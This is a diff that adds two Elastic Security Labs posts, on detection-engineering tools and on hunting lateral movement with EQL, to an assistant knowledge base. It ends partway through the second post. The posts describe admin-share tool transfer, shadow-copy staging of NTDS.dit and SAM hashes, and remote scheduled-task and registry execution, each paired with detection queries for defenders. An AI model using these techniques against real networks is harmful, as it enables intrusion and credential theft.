diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/handy_elastic_tools_for_the_enthusiastic_detection_engineer.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/handy_elastic_tools_for_the_enthusiastic_detection_engineer.md
new file mode 100644
index 0000000000000..8c83f16922324
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/handy_elastic_tools_for_the_enthusiastic_detection_engineer.md
@@ -0,0 +1,98 @@
+---
+title: "Handy Elastic Tools for the Enthusiastic Detection Engineer"
+slug: "handy-elastic-tools-for-the-enthusiastic-detection-engineer"
+date: "2022-09-12"
+description: "Tools like the EQLPlaygound, RTAs, and detection-rules CLI are great resources for getting started with EQL, threat hunting, and detection engineering respectively."
+author:
+  - slug: mika-ayenson
+image: "security-threat-monitoring-compliance-1200x628.jpg"
+category:
+tags:
+  - python
+  - eql
+  - rta
+  - detection-rules
+  - eqlplayground
+---
+
+On August 3, we released Protections-artifacts as part of our Openness Initiative 🎉. One of the benefits of producing open and transparent security content is having the opportunity to work with a great community of security experts. In 2020, we discussed opening our detection rules — in continuing with that spirit, here is an inside peek of three available resources we use within Elastic’s Threat Research and Detection Engineering (TRaDE) team to aid our detection engineering research and development workflows.
+
+TRaDE is responsible for the detection and endpoint behavior security rules that power Elastic’s XDR capabilities. While our detection rules provide visibility to adversary behaviors, the endpoint behavior rules have the capability to prevent an attack. These rules provide protection logic used by Elastic Endpoint Security to stop threats on Windows, Linux, and MacOS endpoints. Collectively, Elastic Security supports a wide range of platforms and data sources (e.g., core cloud service providers, K8s, core operating systems, etc.).
+
+The two rulesets: a) detection rules and b) endpoint behavior rules, consider different use cases and complement each other to provide robust coverage. The comparison table highlights unique differences between the two in terms of protection design goals, how data is processed, and which data is processed.
+
+[Detection Rules](https://github.com/elastic/detection-rules/tree/main/rules)- Design Goals: Provide the most robust detection coverage of all threats, leveraging all data sources available. Some tuning of rules based on organization-specific environments is expected. - Data Streams: Will search across all specified indexes per rule within a Stack. - Engine Processing: Batch process.
+
+[Endpoint Behavior](https://github.com/elastic/protections-artifacts/tree/main/behavior)- Design Goals: Provide very high confidence, prevention-focused, minimal tuning at the expense of false negatives on a per-rule basis. We want every organization to be able to enable behavior protection and have a great experience out of the box, with little tuning required. - Data Streams: Agent searches data on the endpoint. - Engine Processing: Real time data streaming.
+
+Behind the TRaDE crafting curtains, we leverage openly available tools to develop and test our rulesets. If you want a primer on writing Event Query Language (EQL) rules, want to generate suspicious activity to baseline your Elastic-powered detections, or quickly export those suspicious events from Elasticsearch, you may benefit from some of the tools we use. Section 1 introduces our security SIEM features via the EQLPlayground, section 2 discusses our rule testing capability RTA, and section 3 highlights our detection-rules CLI and a few valuable commands we use.
+
+# EQLPlayground
+
+[EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) was developed to express relationships between events, and, coupled with [ECS](https://www.elastic.co/guide/en/ecs/current/index.html), has the power to quickly correlate events across disparate data sources. Whether you want to perform a simple search with EQL, leverage advanced data stacking and filtering to discover anomalies, or define a complex hypothesis-based hunt query, EQL’s flexibility as a language can help improve your team’s effectiveness in many ways. The language is heavily [used](https://cs.github.com/elastic/detection-rules?q=language+%3D+%22eql%22+path%3A%2F%5Erules%5C%2F%2F) (in addition to several other language options, enabling users to leverage the most relevant and applicable features) throughout our [detection-rules repo](https://github.com/elastic/detection-rules) and [endpoint behavior artifacts](https://github.com/elastic/protections-artifacts/tree/main/behavior) to detect adversary behaviors and express relationships between events.
+
+![EQL overview diagram](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image5.png)
+
+While we strive to achieve feature parity between endpoint and elasticsearch EQL implementations to the extent possible, there are minor functional differences due to architectural implementations.
+
+While reading about EQL can be very informative, playing with the query language is a much more fun and interactive learning experience! Thanks to Elastic’s own [James Spiteri](https://www.linkedin.com/in/jamesspiteri/), you can immediately dive into an Elastic Cloud Stack and learn using the [EQLPlaygound](<https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:(id:security-solution-eqldemo,selectedPatterns:!(eqldemo,%27logs-endpoint.*-eqldemo%27,%27logs-system.*-eqldemo%27,%27logs-windows.*-eqldemo%27,metricseqldemo)))&timerange=(global:(linkTo:!(),timerange:(from:%272022-05-29T22:00:00.000Z%27,fromStr:now%2Fd,kind:relative,to:%272022-05-30T21:59:59.999Z%27,toStr:now%2Fd)),timeline:(linkTo:!(),timerange:(from:%272022-04-17T22:00:00.000Z%27,kind:absolute,to:%272022-04-18T21:59:59.999Z%27)))&timeline=(activeTab:eql,graphEventId:%27%27,id:%279844bdd4-4dd6-5b22-ab40-3cd46fce8d6b%27,isOpen:!t)>). The playground takes advantage of the native Security [Timeline](https://www.elastic.co/guide/en/security/current/timelines-ui.html) correlation capabilities, and provides notes to enable learning EQL. The playground is a publicly available Elastic Security instance, pre-populated with suspicious events generated from a Sofacy group [payload](https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/). The only thing you need to access the site is a browser!
+
+![EQLPlayground](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image3.png)
+
+Essentially, you’re presented with a dataset representative of threat activity, similar to what we rely on to build our detection rules and endpoint artifacts. This event data can then be leveraged to generate your own detection logic. It also provides a small introduction to the Elastic Security Stack, and gives you an opportunity to play with some of the cool features available (e.g. Analyzer). The visual event [Analyzer](https://www.elastic.co/guide/en/security/current/visual-event-analyzer.html) shows a graphical representation of a process tree, containing alerts and suspicious events detected by our Elastic Security Endpoint, and illustrates process lineage that can be used within a query.
+
+![Security app Analyzer interface](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image2.png)
+
+We can use this information to understand how the adversary behavior works, and develop a query capable of identifying future malicious activity. For example, should Outlook spawn an explorer.exe child process? Explore the EQLPlayground, EQL [syntax](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html), and [APIs](https://www.elastic.co/guide/en/elasticsearch/reference/8.3/eql-apis.html). In the correlation view [introduced](https://www.elastic.co/blog/whats-new-elastic-security-7-12-0-analyst-driven-correlation-ransomware-prevention) with Elastic Security 7.12, you’ll have the opportunity to insert EQL and develop a query with your special sauce to detect the malicious behavior we’ve executed. You’ll also be able to look at each available field, and the data stream required to capture these events within your Stack.
+
+![Security app Timeline correlation interface](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image4.png)
+
+As you can see, there is an example placeholder query, but you have full access to modify the query based on the full event captured and come up with the best detection. Is there something suspicious about the process tree? What about the sequence of events? Is there something fishy about rundll32.exe (a commonly used [execution proxy](https://attack.mitre.org/techniques/T1218/011/)) making external network calls?
+
+```
+sequence by process.entity_id with maxspan=10s
+[process where process.name : "rundll32.exe" and event.type == "start"]
+[network where process.name : "rundll32.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
+```
+
+We’d love to see what cool and clever queries you’ve come up with, and if you have ideas for new rules, check out our [CONTRIBUTING.md](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md) guide and submit a [new rule](https://github.com/elastic/detection-rules/issues/new?assignees=&labels=Rule%3A+New&template=new_rule.md&title=%5BNew+Rule%5D+Name+of+rule). For now, we’ll use this query in creating a rule with the detection-rule CLI.
+
+# Red Team Automation (RTA)
+
+One of the ways we automate testing Elastic’s ruleset is by launching RTA scripts that simulate threat behaviors. If you are unfamiliar with RTA, it is an open-source tool used by TRaDE to generate suspicious activity and unit test rules across multiple Stack releases. We encourage you to check out the [2018 post](https://www.elastic.co/blog/introducing-endgame-red-team-automation) by [Devon Kerr,](https://www.linkedin.com/in/devonkerr/) which introduced the capability.
+
+Sometimes folks ask our team for sample data, methods to generate suspicious events to baseline configurations, or a testing environment with many alerts already generated in the Elastic Stack. We also regression test rules to validate new features added to the SIEM or Endpoint agent, any modifications based on rule tuning, or for maintenance. This process can become time-consuming with hundreds of rules to test across multiple Stack versions.
+
+In the latest 8.4 dev cycle, we spent some time generating new macOS, Linux, and Windows RTAs. Consistent with the openness theme, we migrated our endpoint behavior tests to the Detection Rules [repo](https://github.com/elastic/detection-rules/tree/main/rta) for the community! Current RTA development is focused on endpoint behavior, and we continue to expand the coverage of our rulesets with new RTAs, so look forward to even more RTAs in the not-too-distant future.
+
+![Cloning RTA](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/cloning_rta.jpg)
+
+Once you’ve cloned the detection-rules repo, you’ll be able to list all available tests. Each RTA includes helpful metadata like the platform the RTA supports, the triggered rules that will alert, and the python code that generates suspicious activity on the target system. The [common](https://github.com/elastic/detection-rules/blob/main/rta/common.py) import is packed with useful functions to simplify creating new RTAs. For example, it provides helper functionality to temporarily edit the Windows registry, check the required operating system is running the RTA, or even execute terminal commands. Essentially, it abstracts a lot of the common activity needed across the RTA set in order to simplify the development of new RTAs, especially for those less familiar with python. The RTA library was designed to use only stdlib Python packages so that no external dependencies would be required. Using only core libraries is greatly beneficial when testing in segmented environments.
+
+![Sample RTA edmond_child_process.py](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image_8.jpg)
+
+In the above example, the RTA generates activity to trigger the [Suspicious Emond Child Process](https://github.com/elastic/detection-rules/blob/main/rules/macos/persistence_emond_rules_process_execution.toml) SIEM and [Potential Persistence via Emond](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_potential_persistence_via_emond.toml) endpoint behavior rules. The RTA creates a bash shell process spawned from a parent process called emond. We aim to make repeatable yet non-destructive test cases to reuse testing infrastructure as much as possible between unit tests. There are many approaches to generating suspicious events that would trigger these rules, so if you’d like to contribute your creative ideas, feel free to submit a pull request to the [detection-rules](https://github.com/elastic/detection-rules)!
+
+# Detection Rules CLI
+
+The detection-rules CLI is a development tool swiss-army-knife that we use to manage and test whether our rules pass validation, but there are useful commands that you can use to speed up rule testing in your own environment. If you’re familiar with Python3, getting started with the Detection Rules CLI commands will only take a few steps. It has useful commands like `view-rule` , which shows the rule as a JSON object in the format expected by Kibana. Conveniently, the command also validates while loading; if you ever want to test that your TOML file matches our schema quickly, you can use this command.
+
+![Detection Rules CLI setup](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image_9.jpg)
+
+After you have installed the package [dependencies](https://github.com/elastic/detection-rules#getting-started) and your credential configuration, you’re ready to use the CLI. One of the cool things about using the CLI is the ability to download data while testing an RTA using the `collect-events` command.
+
+![Detection Rules CLI collect-events function](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image_10.jpg)
+
+Once you start collecting events, the CLI command will idle until you're ready to save events. While you wait, you have an opportunity to jump onto the target machine, execute an RTA, detonate a malware sample, or launch any payloads to trigger an alert. These events can be stored offline and reused later in an automated testing process. With the collect-events command, you can apply several options that scope your exports, like specifying the index and specific [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) of the target system you want. Once the command starts, it gathers all events associated with the host until you’re ready to stop the collection.
+
+![Detection Rules CLI collect-events in action](/assets/images/handy-elastic-tools-for-the-enthusiastic-detection-engineer/image6.gif)
+
+As you can see, it’s possible to run the `collect-events` command, generate malicious activity on a target system (e.g., using an RTA), and download the events locally for review. Some users export and use these events as-is, but we intend to store these events to help automate and streamline our end-to-end testing process.
+
+Apart from the `es` (Elasticsearch) function, we often use several other options like linting our ruleset with `toml-lint` , validating our rules with `validate-all` , or even surveying out ruleset against alerts with in-development commands buried deep within our dev CLI section like `rule-survey`. If you’re interested in reading more about the other fields available, see our guide on [creating a rule with the CLI](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md#creating-a-rule-with-the-cli) or the [CLI.md](https://github.com/elastic/detection-rules/blob/main/CLI.md). As always, if you have any questions or need help, feel free to submit an issue.
+
+Tools like the EQLPlaygound, RTAs, and detection-rules CLI are great resources for getting started with EQL, threat hunting, and detection engineering respectively. Coupled with the detection-rules CLI and RTAs, these tools give security research engineers immediate feedback to begin managing their custom Elastic detection rules. Whether you’re using a cloud Elastic Stack, a local deployment, or are setting up a lab environment with our newly released [Elastic Container Project](https://www.elastic.co/security-labs/the-elastic-container-project), we’ve got you covered. These are just a few tools we use that you're welcome to try out for your internal workflows, they help us test and create rules every day.
+
+In a following article of TRaDE craft, we’ll describe how we validate our rules across languages like EQL or KQL, and how we automate our end-to-end process. Additionally, if you’re interested in hearing how our partners at Tines have integrated Elastic detection logic, check out their blog on [Automating Detection-as-Code](https://www.tines.com/blog/automating-detection-as-code), which walks through the Elastic SIEM, detection content development CI/CD, alert management, and response handling.
+
+We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/protections-artifacts/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_lateral_movement_using_event_query_language.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_lateral_movement_using_event_query_language.md
new file mode 100644
index 0000000000000..e416b0bfdd395
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_lateral_movement_using_event_query_language.md
@@ -0,0 +1,279 @@
+---
+title: "Hunting for Lateral Movement using Event Query Language"
+slug: "hunting-for-lateral-movement-using-event-query-language"
+date: "2023-03-01"
+description: "Elastic Event Query Language (EQL) correlation capabilities enable practitioners to capture complex behavior for adversary Lateral Movement techniques. Learn how to detect a variety of such techniques in this blog post."
+author:
+  - slug: samir-bousseaden
+image: "blog-thumb-security-honeycomb.jpg"
+category:
+  - slug: security-operations
+  - slug: detection-science
+---
+
+[Lateral Movement](https://attack.mitre.org/tactics/TA0008/) describes techniques that adversaries use to pivot through multiple systems and accounts to improve access to an environment and subsequently get closer to their objective. Adversaries might install their own remote access tools to accomplish Lateral Movement, or use stolen credentials with native network and operating system tools that may be stealthier in blending in with normal systems administration activity.
+
+Detecting Lateral Movement behaviors often involves the design of detections at both the source and the target system, as well as the correlation of more than one type of event (such as network events with process execution events) in order to capture the remote execution context.
+
+In this blog, we explore some examples of techniques and leverage the capabilities of Elastic’s [Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) to design behavioral hunts and detections.
+
+## **How Lateral Movement works**
+
+Lateral Movement is usually composed of the following high-level steps:
+
+1. Remote authentication to the target host (valid access credentials are required)
+2. Staging the command to execute to the remote host or to another resource accessible by the target host such as internet URL or a Network File Share
+3. Remotely triggering the execution (immediate or scheduled) of the staged program on the target host via accessible remote services and protocols ([Service](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f), [Task Scheduler](https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page), [WinRM](https://docs.microsoft.com/en-us/windows/win32/winrm/portal), [WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page), [Remote Registry](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78)).
+4. Clean up the staged payload and any other relevant artifacts to avoid suspicion (optional)
+
+Note that staging a program (step 2) is not always necessary, as there are usually exposed services that allow for remote interaction with the target host such as [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1) and [Remote Desktop (RDP)](https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-clients).
+
+## **Lateral Tool Transfer**
+
+Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. A commonly abused vector is [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1570/) via the use of built-in system commands such as copy, move copy-item, and others:
+
+![cmd-running-as-local-host-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/cmd-running-as-local-host-blog-hunting-lateral-movement.jpg)
+
+_Figure 1: File copy via system command_
+
+From the source machine, there are alternative methods of copying the file without having to execute suspicious commands. Still, it’s important to look for low-hanging detection opportunities.
+
+Figure 2 below shows an EQL query that looks for the following behavior that is consistent with an attacker transferring a file to a remote host:
+
+- Execution of a command interpreter with a [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) keyword array related to file copy (copy, move) and a hidden file share (prefixed by a $ sign such as c$ admin$)
+- Staging data from a shadow copy volume (often associated with credential access via staging of [NTDS.dit](https://attack.mitre.org/techniques/T1003/003/) or [Registry SAM](https://attack.mitre.org/techniques/T1003/002/) key to access stored account password hashes)
+
+![2-hunting-eql-file-transfer-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/2-hunting-eql-file-transfer-blog-hunting-lateral-movement.jpg)
+
+_Figure 2: Hunting EQL for file transfer via hidden file share from source machine_
+
+On the target machine, we’ve observed that all files copied via server message block (SMB) are represented by a file creation event by the virtual process System (always has a static [process.pid](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-pid) value equal to 4 and represents the Windows kernel code and loaded kernel mode drivers):
+
+![3-file-creation-discover-view-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/3-file-creation-discover-view-blog-hunting-lateral-movement.jpg)
+
+_Figure 3: File creation event details depicted in Kibana’s Discover view as a result of file transfer over SMB_
+
+A file creation event alone is not enough (the System process may create files that are related to local activity) to conclude that this activity pertains to a Lateral Movement attempt. Thus, we need to correlate it with _incoming_ SMB network events by the same process:
+
+![4-hidden-file-share-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/4-hidden-file-share-blog-hunting-lateral-movement.jpg)
+
+_Figure 4: Hunting EQL for file transfer via hidden file share from target host_
+
+The above query looks for an incoming remote network event to tcp port 445 (SMB) followed by immediate file creation or modification (can be limited to executable file extension to reduce false positives) and both events are performed by the same ([process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id)) virtual System process.
+
+![5-lateral-tool-transfer-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/5-lateral-tool-transfer-blog-hunting-lateral-movement.jpg)
+
+_Figure 5: Detection alert example for Lateral Tool Transfer from target host_
+
+The above alert contains details about the file that was copied as well as the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) address of the Lateral Movement activity. The same logic triggers on [PSExec](https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec), a remote execution utility often abused by adversaries for the same purpose:
+
+![6-triggering-psexec-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/6-triggering-psexec-blog-hunting-lateral-movement.jpg)
+
+_Figure 6: Lateral Tool Transfer triggering on PSEXEC from target host_
+
+We can also leverage [EQL correlation](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to capture instances where a file that was copied via SMB is immediately executed:
+
+![7-execution-via-file-shares-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/7-execution-via-file-shares-blog-hunting-lateral-movement.jpg)
+
+_Figure 7: Hunting EQL for remote execution via file shares_
+
+The above EQL looks for a [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) of events where a file is created/modified by the virtual System process followed by a process event where the [process.executable](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-executable) is equal to the [file.path](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-path). Below is an alert example:
+
+![8-remote-execution-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/8-remote-execution-blog-hunting-lateral-movement.jpg)
+
+_Figure 8: Detection alert for remote execution via file shares from target host_
+
+Another example where file transfer over SMB can be abused for remote execution is copying a malicious executable, script, or shortcut to the [Startup folder](https://attack.mitre.org/techniques/T1547/001/) of a target host. This will cause the program referenced to be automatically executed when a user logs in, and in the context of that user:
+
+![9-startup-folder-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/9-startup-folder-blog-hunting-lateral-movement.jpg)
+
+_Figure 9: Hunting EQL for Lateral Movement via startup folder_
+
+Below is an example of a detection alert for Lateral Movement via the [Startup folder](https://attack.mitre.org/techniques/T1547/001/):
+
+![10-detection-alert-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/10-detection-alert-blog-hunting-lateral-movement.jpg)
+
+_Figure 10: Detection alert for Lateral Movement via startup folder_
+
+## **Remotely Scheduled Tasks**
+
+Adversaries may leverage scheduled tasks for remote execution — either via built-in system utilities such as schtasks.exe or directly via the [Task Scheduler API](https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/), which may be stealthier because visibility is limited.
+
+Below is an example of remote task creation via the [MoveScheduler](https://github.com/mez-0/MoveScheduler) penetration testing tool:
+
+![11-movescheduler-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/11-movescheduler-blog-hunting-lateral-movement.jpg)
+
+Figure 11: Lateral Movement via MoveScheduler
+
+Both schtasks.exe and direct usage of a custom implementation will cause a process to load the Task Scheduler COM API (taskschd.dll), followed by an outbound network connection where both the [source.port](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) and the [destination.port](https://www.elastic.co/guide/en/ecs/current/ecs-destination.html#field-destination-port) are equal or greater than RPC dynamic ports (49152 to 65535) and from the same [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id), which can be translated to this [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) query:
+
+![12-outbound-task-blog-hunting-lateral-movement.png](/assets/images/hunting-for-lateral-movement-using-event-query-language/12-outbound-task-blog-hunting-lateral-movement.png)
+
+_Figure 12: Hunting EQL query for outbound task scheduler activity on source host_
+
+Of course, matches to this query can be related to scheduled tasks discovery as well. Below is an example of an alert where we can observe the username, source, and destination IP, as well as the process name used to perform a remote task activity:
+
+![13-detection-alert-lateral-movement-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/13-detection-alert-lateral-movement-blog-hunting-lateral-movement.jpg)
+
+_Figure 13: Detection alert for Lateral Movement via Scheduled Task on source host_
+
+On the _target_ host, we can hunt for remote scheduled task creation/modification via two options:
+
+1. Incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network event by the Task Scheduler service (svchost.exe) followed by a file creation of a task XML configuration file (C:\\Windows\\System32\\Tasks\\task_filename)
+2. Incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network event by the Task Scheduler service (svchost.exe) followed by a registry change of a task cache Action value (HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\\{GUID\}\\Actions)
+
+Option A provides us with the task name (equal to the [file.name](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-name) of the changed/created file), and Option B provides us with the task action itself (equal to the base64 decoded data of the Action registry value where the task scheduler service caches the task action configuration):
+
+![14-task-creation-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/14-task-creation-blog-hunting-lateral-movement.jpg)
+
+_Figure 14: Hunting EQL query for task creation on target host (Option A)_
+
+![15-hunting-eql-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/15-hunting-eql-blog-hunting-lateral-movement.jpg)
+
+_Figure 15: Hunting EQL query for task creation on target host (Option B)_
+
+Option B has the advantage of providing details about the task action, which tend to be useful while triaging (set to execute a program from a [suspicious path](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_path_cmdline.toml), [LOLBAS](https://lolbas-project.github.io/) process, etc.).
+
+![16-detection-alert-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/16-detection-alert-blog-hunting-lateral-movement.jpg)
+
+_Figure 16: Detection alert for Lateral Movement via Scheduled Task on target host_
+
+Decoding the registry Action base64 encoded data provides us details about the created task action:
+
+![17-base64-blog-hunting-lateral-movement.png](/assets/images/hunting-for-lateral-movement-using-event-query-language/17-base64-blog-hunting-lateral-movement.png)
+
+_Figure 17: Base64 decoded data of the scheduled task action registry value_
+
+## **Remote Registry**
+
+Adversaries may leverage the Remote Registry service for defense evasion or remote execution. One simple scenario is to modify the Run key registry on a remote system to cause the execution of a program upon system startup or user logon:
+
+![18-remote-modification-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/18-remote-modification-blog-hunting-lateral-movement.jpg)
+
+_Figure 18: Remote modification of the Run registry key via reg utility_
+
+We can hunt for this behavior from the source machine by looking for the execution of reg.exe with process.args containing \\\*, but the same action can be achieved via API calls avoiding [process .command_line](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-command-line)-based detections.
+
+![19-reg-exe-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/19-reg-exe-blog-hunting-lateral-movement.jpg)
+
+_Figure 19: Example of Reg.exe process execution event on source host_
+
+Note that Reg.exe is not performing any network connection — instead, it’s the virtual System process that issues an outbound network connection to the target host on port 445 ([DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) over SMB).
+
+On the target host we can see the following sequence of key events:
+
+1. Incoming network connection on tcp port 445 ([DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) over SMB) by the virtual System process ([process.pid](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-pid) equal 4)
+2. RemoteRegistry service process starts (svchost.exe with [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) containing the string RemoteRegistry)
+3. RemoteRegistry service process performs the registry change
+
+![20-remote-registry-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/20-remote-registry-blog-hunting-lateral-movement.jpg)
+
+_Figure 20: Remote Registry-relevant events on target host_
+
+The following [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) hunt can be used to correlate (2) and (3) by [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) and [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) of the Remote Registry service:
+
+![21-remote-registry-blog-hunting-lateral-movement.png](/assets/images/hunting-for-lateral-movement-using-event-query-language/21-remote-registry-blog-hunting-lateral-movement.png)
+
+_Figure 21: Hunting EQL to detect Remote Registry modification via Regsvc on target host_
+
+If we include (1) in the above [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to capture the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) address, it may trigger on unrelated incoming SMB connections as the only common element between the three events limited to the [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) value.
+
+![22-regsvc-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/22-regsvc-blog-hunting-lateral-movement.jpg)
+
+_Figure 22: Detection alert for Remote Registry modification via Regsvc on target host_
+
+Adversaries may attempt to achieve the same outcome via the Windows Management Instrumentation (WMI) registry provider ([StdReg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov)), which behaves differently:
+
+1. WMI Service (svchost.exe with [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) containing Winmgmt string) accepts an incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network connection where both [source.port](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) and the [destination.port](https://www.elastic.co/guide/en/ecs/current/ecs-destination.html#field-destination-port) are greater than or equal to RPC dynamic ports ( 49152 to 65535)
+2. A new instance of the WMI Provider Host (process.name equal to WmiPrvSe.exe with [user.name](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-name) equal to Local Service or [user.id](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-id) equal to S-1-5-19) is started
+3. The started WMI Provider Host loads the registry provider StdProv.dll module
+4. The WMI Provider Host performs the registry change
+
+We can express the correlation of (1), (2) and (4) with the following hunting [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html):
+
+![23-hunting-eql-blog-hunting-lateral-movement.png](/assets/images/hunting-for-lateral-movement-using-event-query-language/23-hunting-eql-blog-hunting-lateral-movement.png)
+
+_Figure 23: Hunting EQL for Remote Registry modification via Regsvc on target host_
+
+If logging of the StdProv.dll module loading is enabled, we can also add (3) to the [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to reduce potential false positives:
+
+![24-hunting-eql-blog-hunting-lateral-movement.png](/assets/images/hunting-for-lateral-movement-using-event-query-language/24-hunting-eql-blog-hunting-lateral-movement.png)
+
+_Figure 24: Hunting EQL for Remote Registry modification via Regsvc on target host (library event)_
+
+Below an example of a detection alert where we can see the remotely modified registry details and the remote [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip):
+
+![25-remote-registry-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/25-remote-registry-blog-hunting-lateral-movement.jpg)
+
+_Figure 25: Detection alert for Remote Registry modification via the WMI on target host_
+
